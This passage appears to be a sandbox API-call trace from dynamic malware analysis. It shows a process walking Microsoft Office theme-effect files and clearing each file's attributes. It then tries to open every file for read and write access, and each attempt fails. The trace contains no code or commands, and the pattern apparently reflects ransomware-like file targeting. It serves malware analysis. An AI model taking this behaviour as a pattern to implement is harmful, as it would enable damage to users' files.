0x350000 [0135.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx", dwFileAttributes=0x80) returned 0 [0135.574] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Aspect.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\aspect.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.574] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.574] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.575] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.575] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.575] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx", dwFileAttributes=0x80) returned 0 [0135.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Austin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\austin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.575] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.575] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.575] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.575] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.575] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx", dwFileAttributes=0x80) returned 0 [0135.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Black Tie.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\black tie.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.576] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.576] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.576] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.576] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx", dwFileAttributes=0x80) returned 0 [0135.576] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Civic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\civic.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.576] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.576] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.576] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.576] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx", dwFileAttributes=0x80) returned 0 [0135.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Clarity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\clarity.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.577] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.577] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.577] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.577] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx", dwFileAttributes=0x80) returned 0 [0135.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Composite.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\composite.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.577] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.577] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.577] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.577] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.578] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx", dwFileAttributes=0x80) returned 0 [0135.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Concourse.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\concourse.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.578] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.578] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.578] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.578] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.578] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx", dwFileAttributes=0x80) returned 0 [0135.578] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Couture.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\couture.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.578] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.578] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.578] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.578] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx", dwFileAttributes=0x80) returned 0 [0135.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Elemental.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\elemental.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.579] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.579] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.579] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx", dwFileAttributes=0x80) returned 0 [0135.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Equity.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\equity.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.579] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.579] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.580] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.580] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx", dwFileAttributes=0x80) returned 0 [0135.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Essential.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\essential.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.580] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.580] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.580] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.580] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx", dwFileAttributes=0x80) returned 0 [0135.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Executive.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\executive.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.581] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.581] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.581] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.581] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx", dwFileAttributes=0x80) returned 0 [0135.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Flow.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\flow.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.581] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.581] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.581] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.581] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx", dwFileAttributes=0x80) returned 0 [0135.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Foundry.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\foundry.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.582] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.582] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.582] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.582] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx", dwFileAttributes=0x80) returned 0 [0135.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Grid.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\grid.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.582] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.582] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.582] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.582] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.583] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx", dwFileAttributes=0x80) returned 0 [0135.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Hardcover.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\hardcover.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.583] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.583] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.583] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.583] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.583] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx", dwFileAttributes=0x80) returned 0 [0135.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Horizon.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\horizon.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.583] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.583] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.583] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.583] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx", dwFileAttributes=0x80) returned 0 [0135.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Median.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\median.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.584] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.584] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.584] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.584] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.584] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx", dwFileAttributes=0x80) returned 0 [0135.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Metro.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\metro.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.584] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.584] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.585] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.585] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx", dwFileAttributes=0x80) returned 0 [0135.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Module.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\module.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.585] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.585] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.585] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.585] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx", dwFileAttributes=0x80) returned 0 [0135.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Newsprint.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\newsprint.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.585] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.586] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.586] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.586] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx", dwFileAttributes=0x80) returned 0 [0135.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Opulent.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\opulent.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.586] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.586] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.586] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.586] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.586] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx", dwFileAttributes=0x80) returned 0 [0135.586] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Oriel.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\oriel.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.587] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.587] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.587] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.587] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx", dwFileAttributes=0x80) returned 0 [0135.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Origin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\origin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.587] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.587] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.587] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.587] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.587] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx", dwFileAttributes=0x80) returned 0 [0135.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Paper.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\paper.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.588] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.588] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.588] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.588] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.588] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx", dwFileAttributes=0x80) returned 0 [0135.588] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Perspective.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\perspective.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.588] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.588] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.588] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.588] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx", dwFileAttributes=0x80) returned 0 [0135.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Pushpin.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\pushpin.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.589] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.589] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.589] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.589] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.589] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx", dwFileAttributes=0x80) returned 0 [0135.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Slipstream.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\slipstream.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.589] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.589] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.590] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.590] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx", dwFileAttributes=0x80) returned 0 [0135.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Solstice.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\solstice.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.590] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.590] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0135.590] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0135.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx", dwFileAttributes=0x80) returned 0 [0135.590] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\Technic.eftx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme effects\\technic.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0135.590] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0135.591] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.591] 